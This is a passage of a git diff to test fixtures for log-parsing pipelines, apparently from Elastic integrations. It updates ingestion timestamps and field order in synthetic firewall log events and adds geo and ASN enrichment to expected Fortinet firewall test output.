"2021-12-14T14:42:59.419369268Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 29 14:59:40 fugits1163.host proto=icmp service=http status=deny src=10.181.247.224 dst=10.77.229.168 src_port=260 dst_port=3777 server_app=atatnon pid=6064 app_name=abor traff_direct=external block_count=329 logon_user=adol@iutal6032.www.test msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234365100Z" + "ingested": "2021-12-14T14:42:59.419369652Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 12 22:02:15 gitse2463.www5.invalid proto=ipv6-icmp service=http status=deny src=10.235.116.121 dst=10.72.162.6 src_port=1 dst_port=5516 server_app=emp pid=2861 app_name=luptas traff_direct=outbound block_count=1444 logon_user=oinv@inculp2078.host msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234371400Z" + "ingested": "2021-12-14T14:42:59.419370069Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 27 05:04:49 temse6953.www.example proto=ipv6-icmp service=https status=deny src=10.149.193.117 dst=10.28.124.236 src_port=5343 dst_port=3434 server_app=atcupi pid=3559 app_name=edquia traff_direct=internal block_count=3176 logon_user=mullam@mexerc2757.internal.home msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234377800Z" + "ingested": "2021-12-14T14:42:59.419370461Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 11 12:07:23 deriti6952.mail.domain proto=ipv6-icmp service=http status=deny src=10.34.131.224 dst=10.196.96.162 src_port=649 dst_port=6378 server_app=equatDu pid=1710 app_name=aconse traff_direct=outbound block_count=7174 logon_user=tnonproi@squira4455.api.domain msg=failure", 
"event": { - "ingested": "2021-12-09T13:37:20.234384200Z" + "ingested": "2021-12-14T14:42:59.419370848Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 25 19:09:57 abor1370.www.domain proto=ipv6-icmp service=https status=deny src=10.97.236.123 dst=10.77.78.180 src_port=5159 dst_port=5380 server_app=reetdol pid=4984 app_name=ugi traff_direct=inbound block_count=4782 logon_user=nisi@emveleum3661.localhost msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234388800Z" + "ingested": "2021-12-14T14:42:59.419371236Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 9 02:12:32 emullamc5418.mail.test proto=ipv6 service=ms-wbt-server status=deny src=10.82.133.66 dst=10.45.54.107 src_port=7229 dst_port=3593 server_app=nse pid=3421 app_name=quira traff_direct=unknown block_count=5362 logon_user=olorem@sedquiac6517.internal.localhost msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234393800Z" + "ingested": "2021-12-14T14:42:59.419371615Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 23 09:15:06 squirati7050.www5.lan proto=rdp service=pop3 status=deny src=10.180.180.230 dst=10.170.252.219 src_port=4147 dst_port=2454 server_app=tesseci pid=4020 app_name=radipis traff_direct=external block_count=7020 logon_user=nse@veniam3148.www5.home msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234400200Z" + "ingested": "2021-12-14T14:42:59.419371994Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 7 16:17:40 venia2079.mail.example proto=rdp service=http status=deny src=10.5.11.205 dst=10.65.144.51 src_port=4901 dst_port=2283 server_app=lumqu pid=617 app_name=autf 
traff_direct=outbound block_count=5050 logon_user=uptat@unt3559.www.home msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234405800Z" + "ingested": "2021-12-14T14:42:59.419372385Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 21 23:20:14 snostrum3450.www5.localhost proto=udp service=smtp status=deny src=10.195.223.82 dst=10.76.122.196 src_port=3128 dst_port=5325 server_app=atu pid=487 app_name=iame traff_direct=external block_count=593 logon_user=umiurer@rere5274.mail.domain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234420500Z" + "ingested": "2021-12-14T14:42:59.419372893Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 5 06:22:49 gelitsed3249.corp proto=icmp service=ms-wbt-server status=deny src=10.138.210.116 dst=10.225.255.211 src_port=5595 dst_port=3369 server_app=rum pid=2442 app_name=eursinto traff_direct=external block_count=956 logon_user=fugiatn@uaeabi3728.www5.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234427400Z" + "ingested": "2021-12-14T14:42:59.419373275Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 19 13:25:23 dolor7082.internal.localhost proto=icmp service=smtp status=deny src=10.250.81.189 dst=10.219.1.151 src_port=5404 dst_port=4323 server_app=redo pid=6311 app_name=ditautf traff_direct=external block_count=3262 logon_user=ori@uamqu2804.test msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234433200Z" + "ingested": "2021-12-14T14:42:59.419373651Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2 20:27:57 totam6886.api.localhost proto=ggp service=https status=deny src=10.54.23.133 dst=10.76.125.70 
src_port=3258 dst_port=756 server_app=oluptat pid=7128 app_name=eseruntm traff_direct=internal block_count=1916 logon_user=oloreeu@olor5201.host msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234438500Z" + "ingested": "2021-12-14T14:42:59.419374035Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 17 03:30:32 laborum5749.www.example proto=igmp service=http status=deny src=10.36.110.69 dst=10.189.42.62 src_port=4187 dst_port=4262 server_app=duntut pid=2780 app_name=ullamc traff_direct=unknown block_count=170 logon_user=eque@eufug3348.www.lan msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234443400Z" + "ingested": "2021-12-14T14:42:59.419374427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 3 10:33:06 lup3313.api.home proto=tcp service=https status=deny src=10.47.179.68 dst=10.183.202.82 src_port=5107 dst_port=2208 server_app=usmod pid=3284 app_name=amni traff_direct=unknown block_count=2645 logon_user=umfugi@stquidol239.www5.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234455500Z" + "ingested": "2021-12-14T14:42:59.419374806Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 17 17:35:40 edq5397.www.test proto=ipv6-icmp service=pop3 status=deny src=10.73.28.165 dst=10.221.206.74 src_port=3668 dst_port=1480 server_app=ihilmole pid=2314 app_name=litanim traff_direct=inbound block_count=5572 logon_user=quas@gia6531.mail.invalid msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234459700Z" + "ingested": "2021-12-14T14:42:59.419375210Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 1 00:38:14 udan6536.www5.test proto=ipv6 service=ms-wbt-server 
status=deny src=10.85.104.146 dst=10.14.204.36 src_port=3442 dst_port=4887 server_app=qua pid=5284 app_name=ents traff_direct=inbound block_count=973 logon_user=emp@lamcola4879.www5.localdomain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234464400Z" + "ingested": "2021-12-14T14:42:59.419375634Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 15 07:40:49 rumet6923.www5.lan proto=rdp service=https status=deny src=10.208.18.210 dst=10.30.246.132 src_port=3601 dst_port=388 server_app=texplica pid=3990 app_name=ore traff_direct=outbound block_count=5624 logon_user=veniam@edquian330.mail.local msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234469600Z" + "ingested": "2021-12-14T14:42:59.419376023Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 itse522.internal.localdomain proto=udp service=pop3 status=deny src=10.106.249.91 dst=10.19.119.17 src_port=1732 dst_port=3822 server_app=veleumi pid=4337 app_name=tvol traff_direct=unknown block_count=2783 logon_user=lit@santi837.api.domain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234475900Z" + "ingested": "2021-12-14T14:42:59.419376408Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 13 21:45:57 amc3059.local proto=igmp service=http status=deny src=10.29.109.126 dst=10.181.41.154 src_port=6261 dst_port=866 server_app=itseddo pid=5275 app_name=seos traff_direct=unknown block_count=6721 logon_user=labo@lpaquiof804.internal.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234481100Z" + "ingested": "2021-12-14T14:42:59.419376794Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 28 04:48:31 
enbyCi3813.api.domain proto=ipv6-icmp service=https status=deny src=10.164.207.42 dst=10.164.120.197 src_port=1901 dst_port=2304 server_app=itametco pid=2286 app_name=remip traff_direct=external block_count=3116 logon_user=pta@nonn4478.host msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234486200Z" + "ingested": "2021-12-14T14:42:59.419377203Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 11 11:51:06 liquipex1155.mail.corp proto=ipv6-icmp service=smtp status=deny src=10.183.189.133 dst=10.154.191.225 src_port=5347 dst_port=7856 server_app=Loremip pid=2990 app_name=tur traff_direct=unknown block_count=6105 logon_user=ita@amquaer3985.www5.example msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234490600Z" + "ingested": "2021-12-14T14:42:59.419377591Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 isn3991.local proto=igmp service=smtp status=deny src=10.29.120.226 dst=10.103.189.199 src_port=1296 dst_port=767 server_app=exerci pid=226 app_name=eserun traff_direct=outbound block_count=5452 logon_user=emu@orem6317.local msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234497Z" + "ingested": "2021-12-14T14:42:59.419377986Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 10 01:56:14 iumtotam1010.www5.corp proto=icmp service=https status=deny src=10.133.254.23 dst=10.210.153.7 src_port=6251 dst_port=7030 server_app=nofdeFi pid=4691 app_name=sautei traff_direct=external block_count=2088 logon_user=voluptas@velill3230.www.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234503200Z" + "ingested": "2021-12-14T14:42:59.419378397Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": 
"1.12.0" - }, "message": "July 24 08:58:48 onsecte91.www5.localdomain proto=tcp service=pop3 status=deny src=10.126.245.73 dst=10.91.2.135 src_port=180 dst_port=2141 server_app=ender pid=5647 app_name=rumSecti traff_direct=outbound block_count=4680 logon_user=olore@orumS757.www5.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234508400Z" + "ingested": "2021-12-14T14:42:59.419378787Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 7 16:01:23 abori7686.internal.host proto=rdp service=https status=deny src=10.183.243.246 dst=10.137.85.123 src_port=218 dst_port=7073 server_app=ntsunti pid=2313 app_name=magnam traff_direct=internal block_count=6402 logon_user=cid@emi4534.www.localdomain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234514600Z" + "ingested": "2021-12-14T14:42:59.419379185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 21 23:03:57 reprehen3513.test proto=ipv6 service=smtp status=deny src=10.61.225.196 dst=10.10.86.55 src_port=4720 dst_port=5132 server_app=isiu pid=1585 app_name=mmodi traff_direct=external block_count=3034 logon_user=eniamqu@inimav1576.mail.example msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234520800Z" + "ingested": "2021-12-14T14:42:59.419379561Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 5 06:06:31 orroquis284.api.domain proto=udp service=http status=deny src=10.125.143.153 dst=10.79.73.195 src_port=2657 dst_port=457 server_app=umf pid=3141 app_name=moll traff_direct=outbound block_count=7645 logon_user=emip@aturQu7083.mail.host msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234526900Z" + "ingested": "2021-12-14T14:42:59.419379968Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 19 13:09:05 tionula2060.www5.localhost proto=ipv6 service=ms-wbt-server status=deny src=10.240.216.85 dst=10.64.139.17 src_port=2046 dst_port=2438 server_app=ice pid=6331 app_name=aal traff_direct=external block_count=4982 logon_user=nimadmin@lumqui7769.mail.local msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234533100Z" + "ingested": "2021-12-14T14:42:59.419380348Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 3 20:11:40 rumSecti111.www5.domain proto=ipv6 service=ms-wbt-server status=deny src=10.87.90.49 dst=10.222.245.80 src_port=1486 dst_port=4017 server_app=itaedict pid=4474 app_name=byCic traff_direct=inbound block_count=3380 logon_user=ptatemse@siarc6339.internal.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234539300Z" + "ingested": "2021-12-14T14:42:59.419380732Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 18 03:14:14 olores7881.local proto=udp service=pop3 status=deny src=10.143.53.214 dst=10.87.144.208 src_port=3310 dst_port=2440 server_app=ipsumq pid=4855 app_name=psaquaea traff_direct=unknown block_count=5772 logon_user=psumq@ptatev6552.www.test msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234545400Z" + "ingested": "2021-12-14T14:42:59.419381130Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 1 10:16:48 tDuis3281.www5.localdomain proto=ipv6-icmp service=pop3 status=deny src=10.204.178.19 dst=10.105.97.134 src_port=616 dst_port=1935 server_app=oremque pid=1729 app_name=inimve traff_direct=unknown block_count=6564 logon_user=mexercit@byC5766.internal.home msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234551700Z" + 
"ingested": "2021-12-14T14:42:59.419381517Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 15 17:19:22 uptasnul2751.www5.corp proto=rdp service=smtp status=deny src=10.161.64.168 dst=10.194.67.223 src_port=7154 dst_port=5767 server_app=tatemse pid=4493 app_name=amqui traff_direct=inbound block_count=3673 logon_user=tion@hender6628.local msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234558Z" + "ingested": "2021-12-14T14:42:59.419381900Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 30 00:21:57 upt6017.api.localdomain proto=tcp service=smtp status=deny src=10.100.154.220 dst=10.120.148.241 src_port=5535 dst_port=1655 server_app=eeufug pid=6094 app_name=modt traff_direct=external block_count=5150 logon_user=rsitam@xercit7649.www5.home msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234564100Z" + "ingested": "2021-12-14T14:42:59.419382314Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 14 07:24:31 tpers2217.internal.lan proto=udp service=ms-wbt-server status=deny src=10.116.153.19 dst=10.180.90.112 src_port=6610 dst_port=1936 server_app=olu pid=5012 app_name=dexercit traff_direct=outbound block_count=2216 logon_user=itessequ@porissu1470.domain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234570600Z" + "ingested": "2021-12-14T14:42:59.419382702Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json index abd66fda118..7f54f83b233 100644 
--- a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json +++ b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json @@ -5,6 +5,18 @@ "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "bytes": 1130, "ip": "67.43.156.13" @@ -85,7 +97,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357746800Z", + "ingested": "2021-12-14T14:43:01.495904852Z", "original": "\u003c188\u003edate=2020-04-23 time=12:17:48 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0316013056\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_blk\" level=\"warning\" vd=\"root\" eventtime=1587230269052907555 tz=\"-0500\" policyid=100602 sessionid=1234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=61930 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"blocked\" reqtype=\"direct\" url=\"/config/\" sentbyte=1152 rcvdbyte=1130 direction=\"outgoing\" msg=\"URL belongs to a denied category in policy\" method=\"domain\" cat=76 catdesc=\"Internet Telephony\"", "code": "0316013056", "timezone": "-0500", @@ -106,6 +118,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 161, "bytes": 0, "ip": "67.43.156.13" 
@@ -175,7 +199,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:37:22.357751700Z",
+ "ingested": "2021-12-14T14:43:01.495907554Z",
 "original": "\u003c189\u003edate=2020-04-23 time=01:16:08 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"OPERATIONAL\" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf=\"srcintfname\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=161 dstintf=\"dstintfname\" dstintfrole=\"lan\" sessionid=155313 proto=17 action=\"deny\" policyid=0 policytype=\"policy\" service=\"SNMP\" dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=\"noop\" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat=\"unscanned\" crscore=30 craction=131072 crlevel=\"high\"",
 "code": "0000000013",
 "kind": "event",
@@ -196,6 +220,18 @@
 "level": "notice"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "bytes": 6812,
 "ip": "67.43.156.13"
@@ -276,7 +312,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357757Z",
+ "ingested": "2021-12-14T14:43:01.495908049Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:17:45 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0317013312\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_allow\" level=\"notice\" vd=\"root\" eventtime=1587230266314799756 tz=\"-0500\" policyid=38 sessionid=543234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=65236 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"passthrough\" reqtype=\"direct\" url=\"/\" sentbyte=3545 rcvdbyte=6812 direction=\"outgoing\" msg=\"URL belongs to an allowed category in policy\" method=\"domain\" cat=23 catdesc=\"Web-based Email\"",
 "code": "0317013312",
 "timezone": "-0500",
@@ -297,6 +333,18 @@
 "level": "information"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "ip": "67.43.156.13"
 },
@@ -384,7 +432,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357762600Z",
+ "ingested": "2021-12-14T14:43:01.495908442Z",
 "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230255061492894 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"",
 "code": "1059028704",
 "timezone": "-0400",
@@ -405,6 +453,18 @@
 "level": "information"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "ip": "67.43.156.13"
 },
@@ -492,7 +552,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357767800Z",
+ "ingested": "2021-12-14T14:43:01.495908862Z",
 "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1591788391 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"",
 "code": "1059028704",
 "timezone": "-0400",
@@ -513,6 +573,18 @@
 "level": "notice"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 53,
 "ip": "67.43.156.13"
 },
@@ -587,7 +659,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357773900Z",
+ "ingested": "2021-12-14T14:43:01.495909251Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"",
 "code": "1501054802",
 "timezone": "-0500",
@@ -609,6 +681,18 @@
 "level": "notice"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 53,
 "ip": "67.43.156.13"
 },
@@ -684,7 +768,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357778600Z",
+ "ingested": "2021-12-14T14:43:01.495909651Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13, 67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"",
 "code": "1501054802",
 "timezone": "-0500",
@@ -706,6 +790,18 @@
 "level": "information"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "ip": "67.43.156.13"
 },
@@ -784,7 +880,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357783Z",
+ "ingested": "2021-12-14T14:43:01.495910031Z",
 "original": "\u003c190\u003edate=2020-04-23 time=12:17:11 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230232148674303 tz=\"-0500\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=63012 dstport=443 srcintf=\"port1\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=100602 sessionid=543234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.no\" incidentserialno=54323 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\"",
 "code": "1059028704",
 "timezone": "-0500",
@@ -805,6 +901,18 @@
 "level": "notice"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 53,
 "ip": "67.43.156.13"
 },
@@ -879,7 +987,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357787800Z",
+ "ingested": "2021-12-14T14:43:01.495910414Z",
